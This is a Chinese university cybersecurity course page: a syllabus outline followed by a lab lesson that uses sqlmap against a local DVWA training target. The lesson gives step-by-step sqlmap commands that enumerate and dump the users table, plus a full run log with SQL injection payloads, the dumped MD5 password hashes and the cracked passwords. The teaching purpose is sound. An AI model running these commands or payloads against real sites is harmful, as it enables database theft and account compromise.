网络安全运行与维护

李成海

目录

  • 1 §1 实训项目1 搭建网络安全实训环境
    • 1.1 导入(第1次课)
    • 1.2 §1.1 靶场:虚拟机CentOS7.8(192.168.112.100)
      • 1.2.1 (1)DVWA-master
      • 1.2.2 (2)sqli-labs(第3次课)
      • 1.2.3 (3)sqlmap
      • 1.2.4 (4)login, loginPHP
      • 1.2.5 (5)Firefox, Hackbar
      • 1.2.6 2022.09.07作业1 “未知攻,焉知防”
      • 1.2.7 2022.09.14作业3“拖库—爆库、爆表、爆字段、爆数据”
      • 1.2.8 Q&A-1(作业批改、辅导答疑)
    • 1.3 §1.2 Burp(第2次课)
      • 1.3.1 2022.09.08作业2 “工欲善其事,必先利其器”
      • 1.3.2 Q&A-2(作业批改、辅导答疑)
    • 1.4 §1.3 Python
      • 1.4.1 Python的Anaconda3集成开发环境
    • 1.5 §1.4 Kali
      • 1.5.1 2022.09.15作业4“永恒之蓝漏洞”
    • 1.6 §1.5 Wireshark
    • 1.7 2022.09.15腾讯会议答疑
  • 2 §2 实训项目2 SQL注入
    • 2.1 ■(1)SQL注入联合查询(第3次课)
      • 2.1.1 附件:联合查询SQL注入模板
      • 2.1.2 ■模板
    • 2.2 (2)SQL注入(PDF文档)
      • 2.2.1 ①更新Kali系统中的Firefox浏览器并安装浏览器插件
      • 2.2.2 (2)部署sqli-labs学习环境
      • 2.2.3 (3)sqli-labs使用教学
      • 2.2.4 (4)实战:SQL注入联合查询-获取数据库数据
    • 2.3 ■(3)部署loginPHP网站
      • 2.3.1 ●SQL注入测试
      • 2.3.2 ●创建数据库、部署简单登录网站loginPHP、进行SQL注入测试(2019.12.17)
      • 2.3.3 ①login.php
      • 2.3.4 ②loginAuth.php
      • 2.3.5 ③loginAuth1.php
      • 2.3.6 ④success.php
      • 2.3.7 ⑤failure.php
      • 2.3.8 ■⑥(loginPHP网站SQL注入)结果截图
    • 2.4 (4)DVWA的SQL Injection
    • 2.5 (5)拓展视野:靶场SQL注入
  • 3 §3 实训项目3 通过SQLmap进行SQL注入并获得后台管理员账号和密码
    • 3.1 (1)安装DVWA
    • 3.2 (2)安装SQLmap
    • 3.3 (3)※实战 SQLmap探测DVWA的SQL注入漏洞
    • 3.4 (4)结果截图(SQLmap拖库)
    • 3.5 (5)使用BurpSuite进行POST方式的SQL注入
    • 3.6 ■附 安装DVWA-1.9(完整版)
  • 4 §4 实训项目4 使用永恒之蓝漏洞对Win7进行渗透
    • 4.1 (1)获取Win7系统shell、开启远程桌面
    • 4.2 (2)截图
    • 4.3 (3)Metasploit渗透测试
    • 4.4 (4)使用msf渗透攻击XP并进行远程关机
  • 5 §5 实训项目5 安装Kali渗透测试系统
    • 5.1 BT到Kali的发展史
    • 5.2 (1)安装Kali
    • 5.3 (2)安装BT5
    • 5.4 ■附 安装Kali、BT5、DVWA、SQLmap、Win7
  • 6 §6 实训项目6 配置Kali渗透测试系统
    • 6.1 (1)安装Kali渗透测试系统
    • 6.2 (2)SSH连接Kali
    • 6.3 (3)※ettercap抓取FTP登录账号和密码
    • 6.4 (4)结果截图(ettercap抓取FTP登录账号和密码)
  • 7 §7 实训项目7 ARP协议安全攻防
    • 7.1 (1)ARP协议安全攻防(试题)
    • 7.2 (2)※ARP协议安全攻防
    • 7.3 (4)实训 防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.4 (3)练习:防御密码嗅探-使用arpspoof实施中间人攻击并抓取密码
    • 7.5 演示视频 arpsproof+etthercap实施中间人攻击
  • 8 §8 实训项目8 暴力破解
    • 8.1 (1)※实战-通过暴力破解Web登录界面获得管理员权限
    • 8.2 (2)字典工具pydictor.py
    • 8.3 (3)hydra和xhydra
    • 8.4 (4)Medusa
    • 8.5 (5)离线破解md5值和shadow加密文件
    • 8.6 (6)Brute Force(DVWA)
    • 8.7 (7)Burp Suite(Windows)
    • 8.8 (8)Burp Suite(Kali)
  • 9 §9 实训项目9 防止黑客攻破Discuz论坛并拿下数据库
    • 9.1 (1)防止黑客攻破Discuz论坛并拿下数据库
    • 9.2 (2)CentOS6.5-desktop及MySQL
  • 10 §10 实训项目10作业 Wireshark抓取Telnet明文包
    • 10.1 (1)※Wireshark抓取Telnet明文包(CentOS6.5)
    • 10.2 (2)结果截图(Wireshark抓取Telnet明文包)
    • 10.3 (3)常用协议分析(ARP、ICMP、TCP、HTTP、DNS)
  • 11 §11 实训项目11 基于文件上传漏洞获得网站shell权限
    • 11.1 ●文件上传(PDF文档)
    • 11.2 (1)基于文件上传漏洞获得网站shell权限
    • 11.3 (2)本地文件包含漏洞截图
    • 11.4 (3)课程资料
    • 11.5 (4)课外 编辑器KindEditor文件上传漏洞
  • 12 §12 实训项目12 Nmap
    • 12.1 (1)安全工具
    • 12.2 (2)Nmap
    • 12.3 (3)网络空间安全(系统渗透测试篇)
    • 12.4 (4)信息收集
  • 13 §13 实训项目13 File Inclusion文件包含漏洞及防御
    • 13.1 (1)本地文件包含
    • 13.2 (2)远程文件包含
  • 14 §14 实训项目14 XSS跨站脚本攻击
    • 14.1 (1)窃取用户Cookie信息保存到远程服务器
    • 14.2 (2)反射型XSS攻击劫持用户浏览器
    • 14.3 (3)存储型XSS窃取用户信息
  • 15 §15 实训项目15 缓冲区溢出漏洞
  • 16 §16 实训项目16 搭建蜜罐系统捕捉黑客操作步骤
  • 17 考核
    • 17.1 平时成绩(40%+30%)
    • 17.2 期末考试(30%)
  • 18 网络1901-04期末考试(2020-2021-2)
    • 18.1 试题1:damicms
    • 18.2 试题2:sqli-labs
    • 18.3 试题3:dvwa
    • 18.4 试题4:loginPHP
  • 19 校外卷重修-B05123网络安全运行与维护复习
    • 19.1 (1)loginPHP
    • 19.2 (2)Python编程
(3)※实战 SQLmap探测DVWA的SQL注入漏洞

(3)实战 SQLmap探测DVWA的SQL注入漏洞

DVWA Cookie

PHPSESSID=j4a07r1il0o7kahb07evptvft4


在CentOS6.5(SQLmap(192.168.112.128))中:

实战1:枚举登录MySQL数据的用户名与密码

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -b --current-db --current-user


实战2:使用命令用来枚举所有登录mysql数据库的用户名和密码hash值,后期可以对密码hash进行破解,生成明文密码

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' --string="Surname" --users --password


实战3:枚举系统中所有的数据库名

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' --dbs


实战4:枚举DVWA数据表

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa --tables


实战5:获取DVWA库中users表的所有列名字

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users --columns


实战6:拖库

sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users -C user,password --dump


实战6:拖库执行情况:

[root@501lilaoshi65 ~]# sqlmap -u "http://192.168.112.100/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie='security=low; PHPSESSID=j4a07r1il0o7kahb07evptvft4' -D dvwa -T users -C user,password --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.0.10.24#dev}

|_ -| . [,]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V          |_|   http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 12:10:28


[12:10:29] [INFO] resuming back-end DBMS 'mysql' 

[12:10:29] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

    Payload: id=2' OR NOT 2561=2561#&Submit=Submit


    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: id=2' AND (SELECT 3481 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(3481=3481,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MLxX&Submit=Submit


    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind

    Payload: id=2' AND SLEEP(5)-- Rwnu&Submit=Submit


    Type: UNION query

    Title: MySQL UNION query (NULL) - 2 columns

    Payload: id=2' UNION ALL SELECT CONCAT(0x716b7a6b71,0x6f52674a596762686d6f6343704464616d554f626d424c4e4f72674d5742634f4468685073565361,0x7178787671),NULL#&Submit=Submit

---

[12:10:29] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 6.8

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0

[12:10:29] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'

[12:10:29] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique

[12:10:29] [INFO] the SQL query used returns 5 entries

[12:10:29] [INFO] resumed: "1337","8d3533d75ae2c3966d7e0d4fcc69216b"

[12:10:29] [INFO] resumed: "admin","5f4dcc3b5aa765d61d8327deb882cf99"

[12:10:29] [INFO] resumed: "gordonb","e99a18c428cb38d5f260853678922e03"

[12:10:29] [INFO] resumed: "pablo","0d107d09f5bbe40cade3de5c71e9e9b7"

[12:10:29] [INFO] resumed: "smithy","5f4dcc3b5aa765d61d8327deb882cf99"

[12:10:29] [INFO] analyzing table dump for possible password hashes                                    

[12:10:29] [INFO] recognized possible password hashes in column 'password'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

[12:10:32] [INFO] writing hashes to a temporary file '/tmp/sqlmapVDAf111901/sqlmaphashes-BmDqSj.txt' 

do you want to crack them via a dictionary-based attack? [Y/n/q] y

[12:10:34] [INFO] using hash method 'md5_generic_passwd'

[12:10:34] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'

[12:10:34] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'

[12:10:34] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'

[12:10:34] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'

[12:10:34] [INFO] postprocessing table dump

Database: dvwa

Table: users

[5 entries]

+---------+---------------------------------------------+

| user    | password                                    |

+---------+---------------------------------------------+

| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |

| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |

| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |

| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------+---------------------------------------------+


[12:10:34] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.112.100/dump/dvwa/users.csv'

[12:10:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.112.100'


[*] shutting down at 12:10:34


[root@501lilaoshi65 ~]# 



************************************************************************

sqlmap选项

sqlmap -u "url" --cookie='security=low;PHPSESSID=x' 其他选项

 1、-u:指定目标URL,SQL注入点

 2、--cookie:设置我们的cookie值


其他选项:

 3、-b:获取DBMS banner(DBMS:Database Management System 数据库管理系统)


 4、--current-db:获取当前数据库

 5、--current-user:获取当前用户


 6、--string="Surname":当查询可用时用来匹配页面中的字符串

 7、--users:枚举DBMS用户

 8、--password:枚举DBMS用户密码hash


 9、--dbs: 枚举DBMS中的所有数据库【库】

10、--tables:枚举DBMS数据库中的所有数据表【表】

11、--columns:枚举DBMS数据库表中的所有列【列】


12、-D dvwa:要枚举的DBMS数据库dvwa【库】

13、-T users:要枚举的DBMS数据表users【表】

14、-C user,password:要枚举的DBMS数据表中的列user,password【列】


--dump:转储DBMS数据表项

************************************************************************